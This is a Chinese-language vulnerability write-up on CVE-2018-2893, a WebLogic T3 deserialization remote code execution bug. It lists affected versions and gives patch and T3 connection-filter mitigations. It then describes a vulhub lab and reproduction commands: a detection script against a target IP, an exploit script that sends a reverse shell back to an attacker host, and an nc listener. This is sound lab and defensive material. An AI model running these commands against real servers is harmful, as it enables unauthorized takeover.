cve-2018-2893 weblogic -WLS核心組件反序列化


漏洞分析

https://www.freebuf.com/column/178103.html

https://www.freebuf.com/vuls/177868.html

 

攻擊者可以在未授權的情況下遠程執行代碼。攻擊者只需要發送精心構造的T3協議數據,就可以獲取目標服務器的權限。攻擊者可利用該漏洞控制組件,影響數據的可用性、保密性和完整性。

影響范圍

Oracle WebLogic Server 10.3.6.0

Oracle WebLogic Server 12.1.3.0

Oracle WebLogic Server 12.2.1.2

Oracle WebLogic Server 12.2.1.3

修復方案

1.Oracle 官方已經在 7 月份中的補丁中修復了該漏洞,建議受影響的用戶盡快升級更新。

下載地址:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html

2.根據業務需求選擇禁用T3協議。

此漏洞產生於WebLogic的T3服務,因此可通過控制T3協議的訪問來臨時阻斷針對該漏洞的攻擊。當開放WebLogic控制台端口(默認為7001端口)時,T3服務會默認開啟。

具體操作:

(1)進入WebLogic控制台,在base_domain的配置頁面中,進入“安全”選項卡頁面,點擊“篩選器”,進入連接篩選器配置。

(2)在連接篩選器中輸入:weblogic.security.net.ConnectionFilterImpl,在連接篩選器規則中輸入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * *deny t3 t3s(t3和t3s協議的所有端口只允許本地訪問)。

(3)保存后需重新啟動。

 

環境搭建

這個環境包含cve-2018-2893

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2628    

 

漏洞復現

1.下載對應編號的檢測和利用腳本

https://github.com/zhzyker/exphub/tree/master/weblogic

利用檢測腳本存在cve-2018-2893

python cve-2018-2893_poc.py 目標ip 7001

 

 

 

漏洞利用

用法

python cve-2018-2893_cmd.py target_host target_port reverse_host reverse_port

 

 

 監聽

nc -lvnp 7777

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM